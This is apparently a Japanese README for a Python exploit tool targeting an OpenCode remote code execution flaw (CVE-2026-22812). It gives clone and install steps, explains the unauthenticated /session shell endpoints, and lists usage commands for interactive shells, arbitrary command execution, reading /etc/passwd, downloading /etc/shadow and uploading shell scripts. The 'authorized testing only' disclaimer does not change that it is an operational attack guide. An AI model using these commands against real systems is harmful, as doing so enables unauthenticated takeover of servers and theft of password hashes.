
Python製のエクスプロイトツールで、OpenCode RCE(CVE-2026-22812)向けに、コマンド実行、ファイルの読み書き・アップロード・ダウンロード、および対話型シェルを提供し、許可されたペネトレーションテストを支援します。
OpenCode のリモートコード実行(RCE)脆弱性(v1.0.216 未満に影響)を悪用するための Python 製エクスプロイトツールです。このツールは、コマンド実行、ファイルの読み書き、ファイルのアップロード/ダウンロード、対話型シェルなど、複数の攻撃ベクトルを提供します。
⚠️ 認可されたテスト専用 ⚠️
# リポジトリのクローン
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812
# 依存関係のインストール
pip install requests urllib3
# 実行可能にする(任意)
chmod +x CVE-2026-22812.py
requests ライブラリurllib3 ライブラリpython3 CVE-2026-22812.py -t http://target:port [options]
# ターゲットが脆弱かどうかを確認
python3 exploit.py -t http://10.0.0.1:4096 --check
# 対話型シェル
python3 exploit.py -t http://10.0.0.1:4096 -i
# 単一コマンドの実行
python3 exploit.py -t http://10.0.0.1:4096 -c "id"
# ファイルの読み取り
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd
# ファイルのアップロード
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh
# ファイルのダウンロード
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt
# システム情報の取得
python3 exploit.py -t http://10.0.0.1:4096 --info
# プロキシの使用(Burp Suite など)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080
対話型シェル(-i フラグ)に入ると、以下のコマンドを使用できます:
<command> シェルコマンドを実行
help ヘルプメニューを表示
exit シェルを終了
session セッション ID を表示
stats エクスプロイト統計を表示
read <file> ファイルの内容を読み取り
download <remote> <local> ファイルをダウンロード
upload <local> <remote> ファイルをアップロード
sysinfo システム情報を取得
この脆弱性はセッション管理エンドポイント(/session)に存在し、認証されていないユーザーがセッションを作成し、/session/{id}/shell エンドポイントを通じて任意のコマンドを実行できるようになります。
POST /session - セッションの作成POST /session/{id}/shell - コマンドの実行GET /file/content - ファイルの読み取りCVE-2026-22812.py
├── Colors クラス(ANSI カラーコード)
├── print_banner()(バナー表示)
├── Exploit クラス(メインのエクスプロイトロジック)
│ ├── __init__()(初期化)
│ ├── check_vuln()(脆弱性チェック)
│ ├── create_session()(セッション作成)
│ ├── exec_cmd()(コマンド実行)
│ ├── read_file()(ファイル読み取り)
│ ├── write_file()(ファイル書き込み)
│ ├── upload()(ファイルアップロード)
│ ├── download()(ファイルダウンロード)
│ ├── get_info()(システム情報)
│ ├── shell()(対話型シェル)
│ └── ヘルパーメソッド
└── main()(引数解析)
このツールは教育目的のみで公開されています。自己責任で使用してください。
問題や質問がある場合は、以下の手順に従ってください: